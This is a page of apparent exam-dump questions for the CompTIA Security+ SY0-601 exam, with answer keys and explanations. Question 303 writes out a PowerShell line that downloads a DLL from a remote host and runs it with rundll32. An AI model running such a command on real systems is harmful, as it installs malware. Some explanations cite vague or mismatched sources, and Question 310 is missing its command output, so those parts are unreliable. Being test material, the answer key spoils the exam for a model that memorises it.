CompTIA CompTIA Certifications SY0-601 Questions & Answers

• Question 301:

  Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

  A. White team

  B. Purple team

  C. Green team

  D. Blue team

  E. Red team

  Correct Answer: A

• Question 302:

  An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed. Which of the following is the MOST likely cause for the high number of findings?

  A. The vulnerability scanner was not properly configured and generated a high number of false positives

  B. Third-party libraries have been loaded into the repository and should be removed from the codebase.

  C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue.

  D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.

  Correct Answer: A

  The most likely cause for the high number of findings is that the vulnerability scanner was not properly configured and generated a high number of false positives. False positive results occur when a vulnerability scanner incorrectly identifies a non-vulnerable system or application as being vulnerable. This can happen due to incorrect configuration, over- sensitive rule sets, or outdated scan databases.

  https://www.professormesser.com/security-plus/sy0-601/sy0-601-video/sy0-601-comptia- security-plus- course/

• Question 303:

  An employee received an email with an unusual file attachment named Updates . Lnk. A security analysts reverse engineering what the fle does and finds that executes the folowing script:

  C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg - OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

  Which of the following BEST describes what the analyst found?

  A. A Powershell code is performing a DLL injection.

  B. A PowerShell code is displaying a picture.

  C. A PowerShell code is configuring environmental variables.

  D. A PowerShell code is changing Windows Update settings.

  Correct Answer: A

  According to GitHub user JSGetty196's notes1, a PowerShell code that uses rundll32.exe to execute a DLL file is performing a DLL injection attack. This is a type of code injection attack that exploits the Windows process loading mechanism. https://www.comptia.org/training/books/security-sy0-601-study-guide

• Question 304:

  A company would like to protect credit card information that is stored in a database from being exposed and reused. However, the current POS system does not support encryption. Which of the following would be BEST suited to secure this information?

  A. Masking

  B. Tokenization

  C. DLP

  D. SSL/TLS

  Correct Answer: B

  Tokenization replaces sensitive data with non-sensitive data, such as a unique identifier. This means that the data is still present in the system, but the sensitive information itself is replaced with the token. Tokenization is more secure than

  masking, which only obscures the data but does not eliminate it. DLP is not suitable for this task, as it is designed to prevent the loss or leakage of data from the system. SSL/TLS can be used to secure the transmission of data, but it cannot

  prevent the data itself from being exposed or reused. For more information, please refer to CompTIA Security+ SY0-601 Exam Objectives, Section 3.3:

  Explain the security purpose of authentication, authorization and accounting (AAA) services, and Section 4.7: Explain the purpose and characteristics of various types of encryption.

• Question 305:

  A company needs to enhance Its ability to maintain a scalable cloud Infrastructure. The Infrastructure needs to handle the unpredictable loads on the company's web application. Which of the following cloud concepts would BEST these requirements?

  A. SaaS

  B. VDI

  C. Containers

  D. Microservices

  Correct Answer: C

  Containers are a type of virtualization technology that allow applications to run in a secure, isolated environment on a single host. They can be quickly scaled up or down as needed, making them an ideal solution for unpredictable loads. Additionally, containers are designed to be lightweight and portable, so they can easily be moved from one host to another. Reference: CompTIA Security+ Sy0-601 official Text book, page 863.

• Question 306:

  A corporate security team needs to secure the wireless perimeter of its physical facilities to ensure only authorized users can access corporate resources.

  Which of the following should the security team do?

  A. Identify rogue access points.

  B. Check for channel overlaps.

  C. Create heat maps.

  D. Implement domain hijacking.

  Correct Answer: A

  Based on CompTIA SY0-601 Security+ guide, the answer to the question is A. Identify rogue access points. To secure the wireless perimeter of its physical facilities, the corporate security team should focus on identifying rogue access points, which are unauthorized access points that have been set up by employees or outsiders to bypass security controls. By identifying and removing these rogue access points, the team can ensure that only authorized users can access corporate resources through the wireless network. https://www.comptia.org/training/books/security-sy0-601-studyguide

• Question 307:

  A user is trying to upload a tax document, which the corporate finance department requested, but a security program IS prohibiting the upload A security analyst determines the file contains Pll, Which of the following steps can the analyst take to correct this issue?

  A. Create a URL filter with an exception for the destination website.

  B. Add a firewall rule to the outbound proxy to allow file uploads

  C. Issue a new device certificate to the user's workstation.

  D. Modify the exception list on the DLP to allow the upload

  Correct Answer: D

  Data Loss Prevention (DLP) policies are used to identify and protect sensitive data, and often include a list of exceptions that allow certain types of data to be uploaded or shared. By modifying the exception list on the DLP, the security analyst can allow the tax document to be uploaded without compromising the security of the system. (Reference: CompTIA Security+ SY0-601 Official Textbook, page 479-480)

• Question 308:

  Which of the following would satisfy three-factor authentication requirements?

  A. Password, PIN, and physical token

  B. PIN, fingerprint scan, and ins scan

  C. Password, fingerprint scan, and physical token

  D. PIN, physical token, and ID card

  Correct Answer: C

  Three-factor authentication combines three types of authentication methods: something you know (password), something you have (physical token), and something you are (fingerprint scan). Option C satisfies these requirements, as it uses a password (something you know), a physical token (something you have), and a fingerprint scan (something you are) for authentication. Reference: CompTIA Security+ Study Guide (SY0-601) 7th Edition by Emmett Dulaney, Chuck Easttom

  Note: There could be other options as well that could satisfy the three-factor authentication requirements as per the organization's security policies.

• Question 309:

  While troubleshooting a service disruption on a mission-critical server, a technician discovered the user account that was configured to run automated processes was disabled because the user's password failed to meet password complexity

  requirements.

  Which of the following would be the BEST solution to securely prevent future issues?

  A. Using an administrator account to run the processes and disabling the account when it is not in use

  B. Implementing a shared account the team can use to run automated processes

  C. Configuring a service account to run the processes

  D. Removing the password complexity requirements for the user account

  Correct Answer: C

  A service account is a user account that is created specifically to run automated processes and services. These accounts are typically not associated with an individual user, and are used for running background services and scheduled tasks. By configuring a service account to run the automated processes, you can ensure that the account will not be disabled due to password complexity requirements and other user- related issues. Reference: CompTIA Security+ Study Guide (SY0-601) 7th Edition by Emmett Dulaney, Chuck Easttom

• Question 310:

  A user attempts to load a web-based application, but the expected login screen does not appear A help desk analyst troubleshoots the issue by running the following command and reviewing the output on the user's PC

  

  The help desk analyst then runs the same command on the local PC

  

  Which of the following BEST describes the attack that is being detected?

  A. Domain hijacking

  B. DNS poisoning

  C. MAC flooding

  D. Evil twin

  Correct Answer: B